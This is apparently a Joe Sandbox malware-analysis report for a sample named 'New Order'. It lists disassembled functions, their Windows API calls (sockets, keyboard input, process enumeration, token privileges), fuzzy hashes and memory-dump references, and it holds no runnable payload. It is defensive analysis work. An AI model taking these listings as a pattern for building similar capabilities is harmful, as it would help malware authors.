Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 13ed185421ee87c6e467b23ad16c47809d0076f7d44fc052f883df4316aeccbc
Instruction ID: 9c1a66cdf08f6878d5c47f33aee2264a64c8451590cba47fa4e670fead3eab9d
Opcode Fuzzy Hash: 13ed185421ee87c6e467b23ad16c47809d0076f7d44fc052f883df4316aeccbc
Instruction Fuzzy Hash: 58F05C7D024B118BD77F22104C889EA332CAF1B306F515956E033E10A0DB70CDC2C642

Function 0032007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adc373f0fcc7a264fe6a7f835c58a34811b26446410b0a9ac6b3f878725da530
Instruction ID: 858079b0f1a0e5e70c369ec608f5b9f5e4e3c13fd950a93b9fe37328869803a1
Opcode Fuzzy Hash: adc373f0fcc7a264fe6a7f835c58a34811b26446410b0a9ac6b3f878725da530
Instruction Fuzzy Hash: 79C18D75A0022AEFDB09CFA4D894EAEB7B5FF48704F218598E505EB252C731ED45CB90

Function 0034342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00343459
CoUninitialize.OLE32 ref: 00343463
VariantInit.OLEAUT32(?), ref: 0034346E
VariantClear.OLEAUT32(?), ref: 0034371B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 9cd4b02629a2f0efedcdd188f0738a449d856d110748f846aa91c17e4ef6ad50
Instruction ID: 7d498a900f3424a386e40cdb4dd5197e4db3c725a6ddcefbd86a3cf95fad8e77
Opcode Fuzzy Hash: 9cd4b02629a2f0efedcdd188f0738a449d856d110748f846aa91c17e4ef6ad50
Instruction Fuzzy Hash: A9A126752142009FC701DF28C985A2AB7E9FF89714F05895DF98A9B362DB30EE01CF91

Function 00320436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0035FC08,?), ref: 003205F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0035FC08,?), ref: 00320608
CLSIDFromProgID.OLE32(?,?,00000000,0035CC40,000000FF,?,00000000,00000800,00000000,?,0035FC08,?), ref: 0032062D
_memcmp.LIBVCRUNTIME ref: 0032064E

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 69740b0902f0f97c8389962a297aed727e540cc494434e8c90d9b6a47b5afe30
Instruction ID: 2b3dbc712796b20760f8644c1736febb0dcd8b182c556d633afc672d8f814da4
Opcode Fuzzy Hash: 69740b0902f0f97c8389962a297aed727e540cc494434e8c90d9b6a47b5afe30
Instruction Fuzzy Hash: 46811C71A00219EFCB05DF94C984EEEB7B9FF89315F204558E506AB251DB71AE0ACF60

Function 00301391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 003014C0

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: cd20e1d7a18d175746b4d7205bbfd1299b4fdb237ef91787ca36e70410b7527b
Instruction ID: 62b70203429b1f6dc2c9219ed36e6a13efd595de31faca8c72499371921c3c8a
Opcode Fuzzy Hash: cd20e1d7a18d175746b4d7205bbfd1299b4fdb237ef91787ca36e70410b7527b
Instruction Fuzzy Hash: E9417C31651104ABDB236BBF8C55ABE3AB8EF42370F150225F918C71E1E77448515A61

Function 00356278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(015BF3E8,?), ref: 003562E2
ScreenToClient.USER32(?,?), ref: 00356315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00356382

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 8fd634801e405753333940d3682cbd9037522839ea34cf9fe81c57f9c0075d5f
Instruction ID: 8dd66e2218c98b3d73afefb31fb6ca0b836719d10ff68eccc04077b2ec155389
Opcode Fuzzy Hash: 8fd634801e405753333940d3682cbd9037522839ea34cf9fe81c57f9c0075d5f
Instruction Fuzzy Hash: 57515B74A00209AFCF12CF54D881EAE7BB5EB45361F518259F8159B2B0D730ED85CB90

Function 00341AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00341AFD
WSAGetLastError.WSOCK32 ref: 00341B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00341B8A
WSAGetLastError.WSOCK32 ref: 00341B94

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 1463153dee6d5962f088d11fcdb275eefdb3d82f210e67034cd43a20adcd5741
Instruction ID: f1531cf3d91a9b372087e65b25781539a64e2be82439196fd6cc4004e6314059
Opcode Fuzzy Hash: 1463153dee6d5962f088d11fcdb275eefdb3d82f210e67034cd43a20adcd5741
Instruction Fuzzy Hash: CB41B234640700AFE721AF24C886F2A77E5EB44718F54854CF91A9F7D2D772ED928B90

Function 002FB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61c1f5b234c973171d79f4f327ed3fdc82dc2aaf9cfac8ffe841018b8378eb36
Instruction ID: 6551d2f1cc4d4b179771ae2e213b98f291f1660902d673483b7a1fc7b48ecae0
Opcode Fuzzy Hash: 61c1f5b234c973171d79f4f327ed3fdc82dc2aaf9cfac8ffe841018b8378eb36
Instruction Fuzzy Hash: 7E412A75A10708AFD726AF38CD51B7AFBE9EB88750F10453AF601DB681D371A9118F80

Function 003356D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00335783
GetLastError.KERNEL32(?,00000000), ref: 003357A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003357CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003357FA

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 86549601594310eb140a18a07e53a254f257c80c1ec344b8ed60daf2d0315a6e
Instruction ID: c43cd8b7a829fee3739418cf945083a7cdff9d4d3846022679023beaca759b9c
Opcode Fuzzy Hash: 86549601594310eb140a18a07e53a254f257c80c1ec344b8ed60daf2d0315a6e
Instruction Fuzzy Hash: 26411939610610DFCB11DF15C485A1ABBE2AF89320F198888EC4AAB362CB34FD11DF91

Function 002FD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,002E6D71,00000000,00000000,002E82D9,?,002E82D9,?,00000001,002E6D71,?,00000001,002E82D9,002E82D9), ref: 002FD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002FD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 002FD9AB
__freea.LIBCMT ref: 002FD9B4

Part of subcall function 002F3820: RtlAllocateHeap.NTDLL(00000000,?,00391444,?,002DFDF5,?,?,002CA976,00000010,00391440,002C13FC,?,002C13C6,?,002C1129), ref: 002F3852

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 0d33cefb6f10d0326907c97295cd3efd9edc4f5cc69e7e963e95b8d514de053d
Instruction ID: 02971ee1fa6d1f9b876de2394be1f8fd4f8d861db63e600436ba6945eea99373
Opcode Fuzzy Hash: 0d33cefb6f10d0326907c97295cd3efd9edc4f5cc69e7e963e95b8d514de053d
Instruction Fuzzy Hash: 3D31A072A2020AABDF259FA5DC45EBEBBA6EB40350F054178FD04D6250E775CD60CB90

Function 003552C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00355352
GetWindowLongW.USER32(?,000000F0), ref: 00355375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00355382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003553A8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: abe7a9c77c9dd0a3d11e0f7942456be54f8faea3675efbb36afb21ce705801fe
Instruction ID: b2c2808f099b2af3bee0c55a57cae6d555a05ca3cddaa332ed306428e3621cab
Opcode Fuzzy Hash: abe7a9c77c9dd0a3d11e0f7942456be54f8faea3675efbb36afb21ce705801fe
Instruction Fuzzy Hash: A031E438A55A08EFEB339F14CC25FE87769AB04392F594112FE19961F0C7B0BD889B41

Function 0032AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 0032ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0032AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0032AC74
SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 0032ACC6

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 4492266b8547e70e8ebb5f9f5e91558e7ef6378b2d22a56c1f85085116569352
Instruction ID: aa8c473a026f9c3df2dbeb1a6450d00e38d25eabfaf601977314852d157eceae
Opcode Fuzzy Hash: 4492266b8547e70e8ebb5f9f5e91558e7ef6378b2d22a56c1f85085116569352
Instruction Fuzzy Hash: 46312870A04B38AFFF37CB65EC047FE7BA9AB85711F04421AE481D61E1C37489858792

Function 00357674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0035769A
GetWindowRect.USER32(?,?), ref: 00357710
PtInRect.USER32(?,?,00358B89), ref: 00357720
MessageBeep.USER32(00000000), ref: 0035778C

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 0bc3ed645b754cc5799c6de494246cdafdd87a2a6e28ff0ee48565a8aa1a229d
Instruction ID: 7f49b0ccc734d7e230f6ea929370c5f4e12fec5e993eaa7bf56bf738fb0d89f3
Opcode Fuzzy Hash: 0bc3ed645b754cc5799c6de494246cdafdd87a2a6e28ff0ee48565a8aa1a229d
Instruction Fuzzy Hash: 22419A34A09215DFCB13CF58E894EA9B7F8FB49346F1A40A9E8149B271C331A949CF90

Function 003516DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 003516EB

Part of subcall function 00323A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00323A57
Part of subcall function 00323A3D: GetCurrentThreadId.KERNEL32 ref: 00323A5E
Part of subcall function 00323A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003225B3), ref: 00323A65

GetCaretPos.USER32(?), ref: 003516FF
ClientToScreen.USER32(00000000,?), ref: 0035174C
GetForegroundWindow.USER32 ref: 00351752

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: b5c61cd0fc3a25f60e7c3359f273946bb53e290891448fb70b5fc96b53eec857
Instruction ID: 3b7f1bc1a78ee658eda6267d19f9a724d669dc9c4332d17062920420d42918bb
Opcode Fuzzy Hash: b5c61cd0fc3a25f60e7c3359f273946bb53e290891448fb70b5fc96b53eec857
Instruction Fuzzy Hash: BC313D71D10249AFC701EFAAC881DAEBBFDEF48304B5080AAE415E7611E6359E45CFA0

Function 0032D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0032D501
Process32FirstW.KERNEL32(00000000,?), ref: 0032D50F
Process32NextW.KERNEL32(00000000,?), ref: 0032D52F
CloseHandle.KERNEL32(00000000), ref: 0032D5DC

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 318812d0c5f488469d3c872922b69d0c85253603e2bd0bcc23218a7928f964de
Instruction ID: 875f9a657b50bc1687575afcb0503fe52beafcfdc91068c53c1fe59c1525f0db
Opcode Fuzzy Hash: 318812d0c5f488469d3c872922b69d0c85253603e2bd0bcc23218a7928f964de
Instruction Fuzzy Hash: 783172711083409FD301EF54D885EAFBBE8EF99354F14052DF581871A1EB719A94CB92

Function 00358FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 002D9BB2

GetCursorPos.USER32(?), ref: 00359001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00317711,?,?,?,?,?), ref: 00359016
GetCursorPos.USER32(?), ref: 0035905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00317711,?,?,?), ref: 00359094

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 5322eead7dc0823eab6ee7075ec0880a1ea381dbc488db595bd739eb0b7acf59
Instruction ID: c3f0bf79e625d66a2154e07f451c7e3b0576998ffee5939dd6802ebd99d15aae
Opcode Fuzzy Hash: 5322eead7dc0823eab6ee7075ec0880a1ea381dbc488db595bd739eb0b7acf59
Instruction Fuzzy Hash: 34219C35600118EFCB278F94C858FEB7BB9EB4A352F044896F905572B1C3319D90EB60

Function 0032D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0035CB68), ref: 0032D2FB
GetLastError.KERNEL32 ref: 0032D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0032D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0035CB68), ref: 0032D376

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 76f165fdc635471e7c257aff6833ea18e6c3c37fc03f3f371c485fc8a817bfcc
Instruction ID: 8cd686ab6b81af2bf611b561b065f5bb2c5eaa1b171eb3a4cd98601721824113
Opcode Fuzzy Hash: 76f165fdc635471e7c257aff6833ea18e6c3c37fc03f3f371c485fc8a817bfcc
Instruction Fuzzy Hash: 9E21A1745183119FC701DF28E8858AEB7E8EE56368F104B1DF499C72A1D731D949CB93

Function 00321571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00321014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0032102A
Part of subcall function 00321014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00321036
Part of subcall function 00321014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00321045
Part of subcall function 00321014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0032104C
Part of subcall function 00321014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00321062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003215BE
_memcmp.LIBVCRUNTIME ref: 003215E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00321617
HeapFree.KERNEL32(00000000), ref: 0032161E

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 496f59ae0743805f71cc7eb51f17dc3d3551556dd549a7dc6f6401f3fa63f80e
Instruction ID: 9f07dfd603885b8da699110314306446a5168d7dce7c348d36ed566191de3b73
Opcode Fuzzy Hash: 496f59ae0743805f71cc7eb51f17dc3d3551556dd549a7dc6f6401f3fa63f80e
Instruction Fuzzy Hash: 2E21CC31E00218EFDF01DFA4DA44BEEB7F8EF50345F198499E841AB240E730AA04CBA0

Function 00352782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0035280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00352824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00352832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00352840

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
